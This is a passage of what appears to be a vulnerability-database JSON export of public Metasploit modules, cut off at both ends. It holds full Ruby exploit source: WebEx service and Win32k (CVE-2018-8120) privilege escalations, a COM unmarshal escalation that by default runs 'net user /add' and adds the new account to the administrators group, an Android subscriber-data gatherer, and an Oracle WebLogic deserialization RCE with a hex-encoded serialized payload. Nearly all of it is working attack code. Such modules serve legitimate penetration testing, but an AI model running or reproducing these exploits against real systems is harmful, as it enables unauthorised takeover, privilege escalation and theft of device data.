connect(versions: [1])\n smb_login\n end\n\n wexec(true) do |opts|\n opts[:flavor] = :vbs\n opts[:linemax] = datastore['MAX_LINE_LENGTH']\n opts[:temp] = datastore['TMPDIR']\n opts[:delay] = 0.05\n execute_cmdstager(opts)\n end\n handler\n disconnect\n end\n\n end\n\n def report_auth\n service_data = {\n address: ::Rex::Socket.getaddress(datastore['RHOST'],true),\n port: datastore['RPORT'],\n service_name: 'smb',\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: self.fullname,\n private_data: datastore['SMBPass'],\n username: datastore['SMBUser'].downcase\n }\n\n if datastore['SMBDomain'] and datastore['SMBDomain'] != 'WORKGROUP'\n credential_data.merge!({\n realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,\n realm_value: datastore['SMBDomain']\n })\n end\n\n if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/\n credential_data.merge!({:private_type => :ntlm_hash})\n else\n credential_data.merge!({:private_type => :password})\n end\n\n credential_data.merge!(service_data)\n\n credential_core = create_credential(credential_data)\n\n login_data = {\n access_level: 'Admin',\n core: credential_core,\n last_attempted_at: DateTime.now,\n status: Metasploit::Model::Login::Status::SUCCESSFUL\n }\n\n login_data.merge!(service_data)\n create_credential_login(login_data)\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/smb/webexec.rb"}, {"lastseen": "2019-03-21T08:58:14", "bulletinFamily": "exploit", "description": "This module exploits a flaw in the 'webexservice' Windows service, which runs as SYSTEM, can be used to run arbitrary commands locally, and can be started by limited users in default installations.", "modified": "2018-10-24T21:13:47", "published": "2018-10-23T20:51:23", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/WEBEXEC", "href": "", "type": "metasploit", "title": "WebEx Local Service Permissions Exploit", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GoodRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Services\n include Msf::Post::Windows::Accounts\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'WebEx Local Service Permissions Exploit',\n 'Description' => %q{\n This module exploits a flaw in the 'webexservice' Windows service, which runs as SYSTEM,\n can be used to run arbitrary commands locally, and can be started by limited users in\n default installations.\n },\n 'References' =>\n [\n ['URL', 'https://webexec.org'],\n ['CVE', '2018-15442']\n ],\n 'DisclosureDate' => \"Oct 09 2018\",\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Jeff McJunkin <jeff.mcjunkin[at]gmail.com>'\n ],\n 'Platform' => [ 'win'],\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'Windows x86', { 'Arch' => ARCH_X86 } ],\n [ 'Windows x64', { 'Arch' => ARCH_X64 } ]\n ],\n 'SessionTypes' => [ \"meterpreter\" ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n 'WfsDelay' => 5,\n 'ReverseConnectRetries' => 255\n },\n 'DefaultTarget' => 0\n ))\n\n register_options([\n OptString.new(\"DIR\", [ false, \"Specify a directory to plant the EXE.\", \"%SystemRoot%\\\\Temp\"])\n ])\n @service_name = 'webexservice'\n end\n\n def validate_arch\n return target unless target.name == 'Automatic'\n\n case sysinfo['Architecture']\n when 'x86'\n fail_with(Failure::BadConfig, 'Invalid payload architecture') if payload_instance.arch.first == 'x64'\n vprint_status('Detected x86 system')\n return targets[1]\n when 'x64'\n vprint_status('Detected x64 system')\n return targets[2]\n end\n end\n\n def check_service_exists?(service)\n srv_info = service_info(service)\n\n if srv_info.nil?\n vprint_warning(\"Unable to enumerate services.\")\n return false\n end\n\n if srv_info && srv_info[:display].empty?\n vprint_warning(\"Service #{service} does not exist.\")\n return false\n else\n return true\n end\n end\n\n def check\n unless check_service_exists?(@service_name)\n return Exploit::CheckCode::Safe\n end\n\n srv_info = service_info(@service_name)\n\n vprint_status(srv_info.to_s)\n\n case START_TYPE[srv_info[:starttype]]\n when 'Disabled'\n vprint_error(\"Service startup is Disabled, so will be unable to exploit unless account has correct permissions...\")\n return Exploit::CheckCode::Safe\n when 'Manual'\n vprint_error(\"Service startup is Manual, so will be unable to exploit unless account has correct permissions...\")\n return Exploit::CheckCode::Safe\n when 'Auto'\n vprint_good(\"Service is set to Automatically start...\")\n end\n\n if check_search_path\n return Exploit::CheckCode::Safe\n end\n\n return Exploit::CheckCode::Appears\n end\n\n def check_write_access(path)\n perm = check_dir_perms(path, @token)\n if perm and perm.include?('W')\n print_good(\"Write permissions in #{path} - #{perm}\")\n return true\n elsif perm\n vprint_status (\"Permissions for #{path} - #{perm}\")\n else\n vprint_status (\"No permissions for #{path}\")\n end\n\n return false\n end\n\n\n def exploit\n begin\n @token = get_imperstoken\n rescue Rex::Post::Meterpreter::RequestError\n vprint_error(\"Error while using get_imperstoken: #{e}\")\n end\n\n fail_with(Failure::Unknown, \"Unable to retrieve token.\") unless @token\n\n if is_system?\n fail_with(Failure::Unknown, \"Current user is already SYSTEM, aborting.\")\n end\n\n print_status(\"Checking service exists...\")\n if !check_service_exists?(@service_name)\n fail_with(Failure::NoTarget, \"The service doesn't exist.\")\n end\n\n if is_uac_enabled?\n print_warning(\"UAC is enabled, may get false negatives on writable folders.\")\n end\n\n # Use manually selected Dir\n file_path = datastore['DIR']\n\n @exe_file_name = Rex::Text.rand_text_alphanumeric(8)\n @exe_file_path = \"#{file_path}\\\\#{@exe_file_name}.exe\"\n\n service_information = service_info(@service_name)\n\n # Check architecture\n valid_arch = validate_arch\n exe = generate_payload_exe(:arch => valid_arch.arch)\n\n #\n # Drop the malicious executable into the path\n #\n print_status(\"Writing #{exe.length.to_s} bytes to #{@exe_file_path}...\")\n begin\n write_file(@exe_file_path, exe)\n register_file_for_cleanup(@exe_file_path)\n rescue Rex::Post::Meterpreter::RequestError => e\n # Can't write the file, can't go on\n fail_with(Failure::Unknown, e.message)\n end\n\n #\n # Run the service\n #\n print_status(\"Launching service...\")\n res = cmd_exec(\"cmd.exe\",\n \"/c sc start webexservice install software-update 1 #{@exe_file_path}\")\n\n if service_restart(@service_name)\n print_status(\"Service started...\")\n else\n service_information = service_info(@service_name)\n if service_information[:starttype] == START_TYPE_AUTO\n if job_id\n print_status(\"Unable to start service, handler running waiting for a reboot...\")\n while(true)\n break if session_created?\n select(nil,nil,nil,1)\n end\n else\n fail_with(Failure::Unknown, \"Unable to start service, use exploit -j to run as a background job and wait for a reboot...\")\n end\n else\n fail_with(Failure::Unknown, \"Unable to start service, and it does not auto start, cleaning up...\")\n end\n end\n end\nend\n\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/webexec.rb"}, {"lastseen": "2019-04-29T12:29:05", "bulletinFamily": "exploit", "description": "This module exploits a local privilege escalation bug which exists in microsoft COM for windows when it fails to properly handle serialized objects.", "modified": "2018-10-23T22:15:34", "published": "2018-10-19T23:15:44", "id": "MSF:POST/WINDOWS/ESCALATE/UNMARSHAL_CMD_EXEC", "href": "", "type": "metasploit", "title": "Windows unmarshal post exploitation", "sourceData": "# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/post/common'\nrequire 'msf/core/post/file'\nrequire 'msf/core/post/windows/priv'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Common\n include Msf::Post::File\n# include Msf::Post::Windows::Priv\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Windows unmarshal post exploitation',\n 'Description' => %q{\n This module exploits a local privilege escalation bug which exists\n in microsoft COM for windows when it fails to properly handle serialized objects.},\n 'References' =>\n [\n ['CVE', '2018-0824'],\n ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0824'],\n ['URL', 'https://github.com/x73x61x6ex6ax61x79/UnmarshalPwn'],\n ['EDB', '44906']\n ],\n 'Author' =>\n [\n 'Nicolas Joly', # Vulnerability discovery\n 'Matthias Kaiser', # Exploit PoC\n 'Sanjay Gondaliya', # Modified PoC\n 'Pratik Shah <pratik@notsosecure.com>' # Metasploit module\n ],\n 'DisclosureDate' => 'Aug 05 2018',\n 'Platform' => ['win'],\n 'Targets' =>\n [\n ['Windows x64', { 'Arch' => ARCH_X64 }]\n ],\n 'License' => MSF_LICENSE,\n ))\n\n register_options(\n [\n OptString.new('COMMAND',\n [false, 'The command to execute as SYSTEM (Can only be a cmd.exe builtin or Windows binary, (net user /add %RAND% %RAND% & net localgroup administrators /add <user>).', nil]),\n OptString.new('EXPLOIT_NAME',\n [false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),\n OptString.new('SCRIPT_NAME',\n [false, 'The filename to use for the COM script file (%RAND% by default).', nil]),\n OptString.new('PATH',\n [false, 'Path to write binaries (%TEMP% by default).', nil]),\n ])\n end\n\n def setup\n super\n validate_active_host\n @exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))\n @script_name = datastore['SCRIPT_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))\n @exploit_name = \"#{exploit_name}.exe\" unless exploit_name.match(/\\.exe$/i)\n @script_name = \"#{script_name}.sct\" unless script_name.match(/\\.sct$/i)\n @temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP')\n @exploit_path = \"#{temp_path}\\\\#{exploit_name}\"\n @script_path = \"#{temp_path}\\\\#{script_name}\"\n end\n\n def populate_command\n username = Rex::Text.rand_text_alpha((rand(8) + 6))\n password = Rex::Text.rand_text_alpha((rand(8) + 6))\n print_status(\"username = #{username}, password = #{password}\")\n cmd_to_run = 'net user /add ' + username + ' ' + password\n cmd_to_run += ' & net localgroup administrators /add ' + username\n print_status(cmd_to_run)\n return cmd_to_run\n end\n\n def validate_active_host\n begin\n print_status(\"Attempting to Run on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}\")\n rescue Rex::Post::Meterpreter::RequestError => e\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\n raise Msf::Exploit::Failed, 'Could not connect to session'\n end\n end\n\n def validate_remote_path(path)\n unless directory?(path)\n fail_with(Failure::Unreachable, \"#{path} does not exist on the target\")\n end\n end\n\n def validate_target\n if sysinfo['Architecture'] == ARCH_X86\n fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')\n end\n if sysinfo['OS'] =~ /XP/\n fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')\n end\n end\n\n def ensure_clean_destination(path)\n if file?(path)\n print_status(\"#{path} already exists on the target. Deleting...\")\n begin\n file_rm(path)\n print_status(\"Deleted #{path}\")\n rescue Rex::Post::Meterpreter::RequestError => e\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\n print_error(\"Unable to delete #{path}\")\n end\n end\n end\n\n def upload_exploit\n local_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'UnmarshalPwn.exe')\n upload_file(exploit_path, local_exploit_path)\n print_status(\"Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}\")\n end\n\n def upload_script(cmd_to_run)\n vprint_status(\"Creating the sct file with command #{cmd_to_run}\")\n local_script_template_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'script_template')\n script_template_data = ::IO.read(local_script_template_path)\n vprint_status(\"script_template_data.length = #{script_template_data.length}\")\n full_command = 'cmd.exe /c ' + cmd_to_run\n full_command = full_command\n script_data = script_template_data.sub!('SCRIPTED_COMMAND', full_command)\n if script_data == nil\n fail_with(Failure::BadConfig, \"Failed to substitute command in script_template\")\n end\n vprint_status(\"Writing #{script_data.length} bytes to #{script_path} to target\")\n write_file(script_path, script_data)\n vprint_status('Script uploaded successfully')\n end\n\n def run\n if datastore['COMMAND'].nil?\n cmd_to_run = populate_command\n else\n cmd_to_run = datastore['COMMAND']\n end\n print_status(\"exploit path is: #{exploit_path}\")\n print_status(\"script path is: #{script_path}\")\n print_status(\"command is: #{cmd_to_run}\")\n begin\n validate_active_host\n validate_target\n validate_remote_path(temp_path)\n ensure_clean_destination(exploit_path)\n ensure_clean_destination(script_path)\n vprint_status(\"Uploading Script to #{script_path}\")\n upload_script(cmd_to_run)\n vprint_status(\"Uploading Exploit to #{exploit_path}\")\n upload_exploit\n vprint_status('Launching Exploit...')\n command_output = cmd_exec(exploit_path + ' ' + script_path)\n vprint_status(command_output)\n print_good('Exploit Completed')\n ensure_clean_destination(exploit_path)\n ensure_clean_destination(script_path)\n rescue Rex::Post::Meterpreter::RequestError => e\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\n print_good('Command failed, cleaning up')\n print_error(e.message)\n ensure_clean_destination(exploit_path)\n ensure_clean_destination(script_path)\n end\n end\n attr_reader :exploit_name\n attr_reader :script_name\n attr_reader :temp_path\n attr_reader :exploit_path\n attr_reader :script_path\nend\n\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/escalate/unmarshal_cmd_exec.rb"}, {"lastseen": "2019-04-25T08:20:34", "bulletinFamily": "exploit", "description": "This module exploits elevation of privilege vulnerability that exists in Windows 7 and 2008 R2 when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. This module is tested against windows 7 x86, windows 7 x64 and windows server 2008 R2 standard x64.", "modified": "2018-10-18T19:30:20", "published": "2018-10-10T19:41:14", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/MS18_8120_WIN32K_PRIVESC", "href": "", "type": "metasploit", "title": "Windows SetImeInfoEx Win32k NULL Pointer Dereference", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GoodRanking\n\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Post::Windows::Priv\n include Msf::Exploit::FileDropper\n\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows SetImeInfoEx Win32k NULL Pointer Dereference',\n 'Description' => %q{\n This module exploits elevation of privilege vulnerability that exists in Windows 7 and 2008 R2\n when the Win32k component fails to properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run arbitrary code in kernel mode. An\n attacker could then install programs; view, change, or delete data; or create new\n accounts with full user rights.\n\n This module is tested against windows 7 x86, windows 7 x64 and windows server 2008 R2 standard x64.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'unamer', # Exploit PoC\n 'bigric3', # Analysis and exploit\n 'Anton Cherepanov', # Vulnerability discovery\n 'Dhiraj Mishra <dhiraj@notsosecure.com>' # Metasploit\n ],\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread'\n },\n 'Targets' => [\n [ 'Automatic', {} ],\n [ 'Windows 7 x64', { 'Arch' => ARCH_X64 } ],\n [ 'Windows 7 x86', { 'Arch' => ARCH_X86 } ]\n ],\n 'Payload' => {\n 'Space' => 4096,\n 'DisableNops' => true\n },\n 'References' => [\n ['BID', '104034'],\n ['CVE', '2018-8120'],\n ['URL', 'https://github.com/unamer/CVE-2018-8120'],\n ['URL', 'https://github.com/bigric3/cve-2018-8120'],\n ['URL', 'http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html'],\n ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120']\n ],\n 'DisclosureDate' => 'May 9 2018',\n 'DefaultTarget' => 0\n ))\n end\n\n def assign_target\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n if sysinfo['OS'] =~ /XP|NT/i\n fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')\n end\n\n return target unless target.name == 'Automatic'\n\n case sysinfo['Architecture']\n when 'x64'\n vprint_status('Targeting x64 system')\n return targets[1]\n when 'x86'\n fail_with(Failure::BadConfig, \"Invalid payload architecture\") if payload_instance.arch.first == ARCH_X64\n vprint_status('Targeting x86 system')\n return targets[2]\n end\n end\n\n def write_file_to_target(fname, data)\n tempdir = session.sys.config.getenv('TEMP')\n file_loc = \"#{tempdir}\\\\#{fname}\"\n vprint_warning(\"Attempting to write #{fname} to #{tempdir}\")\n write_file(file_loc, data)\n vprint_good(\"#{fname} written\")\n file_loc\n rescue Rex::Post::Meterpreter::RequestError => e\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\n fail_with(Failure::Unknown, \"Writing #{fname} to disk was unsuccessful\")\n end\n\n def check_arch\n sys_arch = assign_target\n if sys_arch.name =~ /x86/\n return 'CVE-2018-8120x86.exe'\n else sys_arch.name =~ /x64/\n return 'CVE-2018-8120x64.exe'\n end\n end\n\n def exploit\n cve_fname = check_arch\n rexe = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', cve_fname)\n vprint_status(\"Reading payload from file #{rexe}\")\n raw = File.read(rexe)\n\n rexename = \"#{Rex::Text.rand_text_alphanumeric(10)}.exe\"\n vprint_status(\"EXE's name is: #{rexename}\")\n exe = generate_payload_exe\n tempexename = \"#{Rex::Text.rand_text_alpha(6..14)}.exe\"\n\n exe_payload = write_file_to_target(tempexename, exe)\n vprint_status(\"Payload uploaded to temp folder\")\n cve_exe = write_file_to_target(rexename, raw)\n command = \"\\\"#{cve_exe}\\\" \\\"#{exe_payload}\\\"\"\n vprint_status(\"Location of CVE-2018-8120.exe is: #{cve_exe}\")\n register_file_for_cleanup(exe_payload)\n\n vprint_status(\"Executing command : #{command}\")\n cmd_exec_get_pid(command)\n print_good('Exploit finished, wait for privileged payload execution to complete.')\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb"}, {"lastseen": "2019-03-16T14:17:18", "bulletinFamily": "exploit", "description": "This module displays the subscriber info stored on the target phone. It uses call service to get values of each transaction code like imei etc.", "modified": "2018-10-01T08:54:46", "published": "2018-10-01T08:54:46", "id": "MSF:POST/ANDROID/GATHER/SUB_INFO", "href": "", "type": "metasploit", "title": "extracts subscriber info from target device", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n\n include Msf::Post::Common\n include Msf::Post::Android::Priv\n include Msf::Post::Android::System\n\n def initialize(info={})\n super( update_info( info, {\n 'Name' => \"extracts subscriber info from target device\",\n 'Description' => %q{\n This module displays the subscriber info stored on the target phone.\n It uses call service to get values of each transaction code like imei etc.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['Auxilus'],\n 'SessionTypes' => [ 'meterpreter', 'shell' ],\n 'Platform' => 'android',\n }\n ))\n end\n\n def run\n unless is_root?\n print_error(\"This module requires root permissions.\")\n return\n end\n\n @transaction_codes ||= [\n 'DeviceId',\n 'DeviceIdForSubscriber',\n 'ImeiForSubscriber',\n 'DeviceSvn',\n 'SubscriberId',\n 'SubscriberIdForSubscriber',\n 'GroupIdLevel1',\n 'GroupIdLevel1ForSubscriber',\n 'IccSerialNumber',\n 'IccSerialNumberForSubscriber',\n 'Line1Number',\n 'Line1NumberForSubscriber',\n 'Line1AlphaTag',\n 'Line1AlphaTagForSubscriber',\n 'Msisdn',\n 'MsisdnForSubscriber',\n 'VoiceMailNumber',\n 'VoiceMailNumberForSubscriber',\n 'CompleteVoiceMailNumber',\n 'CompleteVoiceMailNumberForSubscriber',\n 'VoiceMailAlphaTag',\n 'VoiceMailAlphaTagForSubscriber',\n 'IsimImpi',\n 'IsimDomain',\n 'IsimImpu',\n 'IsimIst',\n 'IsimPcscf',\n 'IsimChallengeResponse',\n 'IccSimChallengeResponse'\n ]\n values ||= []\n arr ||= []\n for code in 1..@transaction_codes.length do\n print_status(\"using code : #{code}\")\n cmd = \"service call iphonesubinfo #{code}\"\n block = cmd_exec(cmd)\n value,tc = get_val(block, code)\n arr << [tc, value]\n end\n\n tc_tbl = Rex::Text::Table.new(\n 'Header' => 'Subscriber info',\n 'Indent' => 1,\n 'Columns' => ['transaction code', 'value']\n )\n\n arr.each do |a|\n tc_tbl << [\n a[0], # TRANSACTION CODE\n a[1] # value\n ]\n end\n print_line(tc_tbl.to_s)\n end\n\n def get_val(data, code)\n parsed = data.gsub(/Parcel/, '')\n string = ''\n 100.times do |i|\n next if i % 2 == 0\n str = parsed.split(\"'\")[i]\n break if str.nil?\n string += str\n end\n v = ''\n string.split(\".\").each do |chr|\n next if chr.nil? or chr == \"\\n\"\n v += chr\n end\n return v,@transaction_codes[code-1]\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/android/gather/sub_info.rb"}, {"lastseen": "2018-08-28T09:31:33", "bulletinFamily": "exploit", "description": "An unauthenticated attacker with network access to the Oracle Weblogic Server T3 interface can send a serialized object to the interface to execute code on vulnerable hosts.", "modified": "2018-08-09T19:51:56", "published": "2018-08-09T16:35:14", "id": "MSF:EXPLOIT/WINDOWS/MISC/WEBLOGIC_DESERIALIZE", "href": "", "type": "metasploit", "title": "Oracle Weblogic Server Deserialization RCE", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/powershell'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::TcpServer\n include Msf::Exploit::Powershell\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Oracle Weblogic Server Deserialization RCE',\n 'Description' => %q{\n An unauthenticated attacker with network access to the Oracle Weblogic\n Server T3 interface can send a serialized object to the interface to\n execute code on vulnerable hosts.\n },\n 'Author' =>\n [\n 'brianwrf', # EDB PoC\n 'Jacob Robles' # Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2018-2628'],\n ['EDB', '44553']\n ],\n 'Privileged' => false,\n 'Targets' =>\n [\n [ 'Windows',\n {\n 'Platform' => ['win']\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' =>\n {\n 'RPORT' => 7001\n },\n 'DisclosureDate' => 'Apr 17 2018'))\n end\n\n def gen_resp\n pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first)\n pwrshl.gsub!(\"%COMSPEC%\", \"cmd.exe\")\n tmp_dat = pwrshl.each_byte.map {|b| b.to_s(16)}.join\n\n mycmd = (tmp_dat.length >> 1).to_s(16).rjust(4,'0')\n mycmd << tmp_dat\n\n # Response data taken from JRMPListener generated data:\n # java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener <lport> CommonsCollections1 'calc.exe'\n # Modified captured network traffic bytes. Patch in command to run\n @resp = '51aced0005770f02086f5ef3000001651a67984d80017372002e6a617661782e'\n @resp << '6d616e6167656d656e742e42616441747472696275746556616c756545787045'\n @resp << '7863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176'\n @resp << '612f6c616e672f4f626a6563743b70787200136a6176612e6c616e672e457863'\n @resp << '657074696f6ed0fd1f3e1a3b1cc402000070787200136a6176612e6c616e672e'\n @resp << '5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c'\n @resp << '6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d6573'\n @resp << '736167657400124c6a6176612f6c616e672f537472696e673b5b000a73746163'\n @resp << '6b547261636574001e5b4c6a6176612f6c616e672f537461636b547261636545'\n @resp << '6c656d656e743b4c001473757070726573736564457863657074696f6e737400'\n @resp << '104c6a6176612f7574696c2f4c6973743b70787071007e0008707572001e5b4c'\n @resp << '6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c'\n @resp << '3cfd2239020000707870000000047372001b6a6176612e6c616e672e53746163'\n @resp << '6b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e'\n @resp << '756d6265724c000e6465636c6172696e67436c61737371007e00054c00086669'\n @resp << '6c654e616d6571007e00054c000a6d6574686f644e616d6571007e0005707870'\n @resp << '0000011b74001e79736f73657269616c2e6578706c6f69742e4a524d504c6973'\n @resp << '74656e65727400114a524d504c697374656e65722e6a617661740006646f4361'\n @resp << '6c6c7371007e000b000000e071007e000d71007e000e740009646f4d65737361'\n @resp << '67657371007e000b000000ab71007e000d71007e000e74000372756e7371007e'\n @resp << '000b0000007771007e000d71007e000e7400046d61696e737200266a6176612e'\n @resp << '7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c6973'\n @resp << '74fc0f2531b5ec8e100200014c00046c69737471007e0007707872002c6a6176'\n @resp << '612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c6543'\n @resp << '6f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a617661'\n @resp << '2f7574696c2f436f6c6c656374696f6e3b707870737200136a6176612e757469'\n @resp << '6c2e41727261794c6973747881d21d99c7619d03000149000473697a65707870'\n @resp << '000000007704000000007871007e001b787372003273756e2e7265666c656374'\n @resp << '2e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e'\n @resp << '48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c7565'\n @resp << '7374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a61'\n @resp << '76612f6c616e672f436c6173733b707870737d00000001000d6a6176612e7574'\n @resp << '696c2e4d617074001066696c653a2f746d702f73732e6a6172787200176a6176'\n @resp << '612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c'\n @resp << '0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174'\n @resp << '696f6e48616e646c65723b7078707371007e001c7372002a6f72672e61706163'\n @resp << '68652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d'\n @resp << '61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f61'\n @resp << '70616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e7366'\n @resp << '6f726d65723b74001066696c653a2f746d702f73732e6a617278707372003a6f'\n @resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6675'\n @resp << '6e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97'\n @resp << '040200015b000d695472616e73666f726d65727374002d5b4c6f72672f617061'\n @resp << '6368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f72'\n @resp << '6d65723b74001066696c653a2f746d702f73732e6a617278707572002d5b4c6f'\n @resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472'\n @resp << '616e73666f726d65723bbd562af1d834189902000074001066696c653a2f746d'\n @resp << '702f73732e6a61727870000000057372003b6f72672e6170616368652e636f6d'\n @resp << '6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e737461'\n @resp << '6e745472616e73666f726d6572587690114102b1940200014c000969436f6e73'\n @resp << '74616e7471007e000174001066696c653a2f746d702f73732e6a617278707672'\n @resp << '00116a6176612e6c616e672e52756e74696d6500000000000000000000007078'\n @resp << '707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c65637469'\n @resp << '6f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287'\n @resp << 'e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e67'\n @resp << '2f4f626a6563743b4c000b694d6574686f644e616d6571007e00055b000b6950'\n @resp << '6172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7400'\n @resp << '1066696c653a2f746d702f73732e6a61727870757200135b4c6a6176612e6c61'\n @resp << '6e672e4f626a6563743b90ce589f1073296c0200007078700000000274000a67'\n @resp << '657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab'\n @resp << '16d7aecbcd5a99020000707870000000007400096765744d6574686f64757100'\n @resp << '7e003e00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a'\n @resp << '3bb3420200007078707671007e003e7371007e00367571007e003b0000000270'\n @resp << '7571007e003b00000000740006696e766f6b657571007e003e00000002767200'\n @resp << '106a6176612e6c616e672e4f626a656374000000000000000000000070787076'\n @resp << '71007e003b7371007e0036757200135b4c6a6176612e6c616e672e537472696e'\n @resp << '673badd256e7e91d7b470200007078700000000174'\n\n @resp << mycmd\n\n @resp << '74'\n @resp << '0004657865637571007e003e0000000171007e00437371007e0031737200116a'\n @resp << '6176612e6c616e672e496e746567657212e2a0a4f78187380200014900057661'\n @resp << '6c756570787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b'\n @resp << '02000070787000000001737200116a6176612e7574696c2e486173684d617005'\n @resp << '07dac1c31660d103000246000a6c6f6164466163746f72490009746872657368'\n @resp << '6f6c647078703f40000000000000770800000010000000007878767200126a61'\n @resp << '76612e6c616e672e4f7665727269646500000000000000000000007078707100'\n @resp << '7e005a'\n end\n\n\n def 